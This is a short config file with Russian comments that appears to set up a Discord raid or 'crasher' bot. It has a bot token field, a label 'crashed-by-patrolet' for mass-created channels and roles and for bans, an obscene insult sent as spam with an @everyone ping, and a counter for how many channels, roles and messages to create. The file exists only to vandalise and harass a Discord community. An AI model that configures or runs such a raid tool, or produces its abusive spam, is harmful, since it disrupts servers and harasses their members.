# ТОКЕН БОТА
TOKEN=""
# НАЗВАНИЯ КАНАЛОВ И РОЛЕЙ, ПРИЧИНА БАНА | ВМЕСТО ПРОБЕЛОВ ЮЗАТЬ: - (тире)
UNITED_NAME="crashed-by-patrolet"
# СПАМ ТЕКСТ В КАНАЛЫ 
SPAM_TEXT="-# сервер говнище ебанное @everyone"
# КОЛИЧЕСТВО СОЗДАВАЕМЫХ КАНАЛОВ, РОЛЕЙ, ОТПРАВЛЯЕМОГО ТЕКСТА
UNITED_COUNTER=2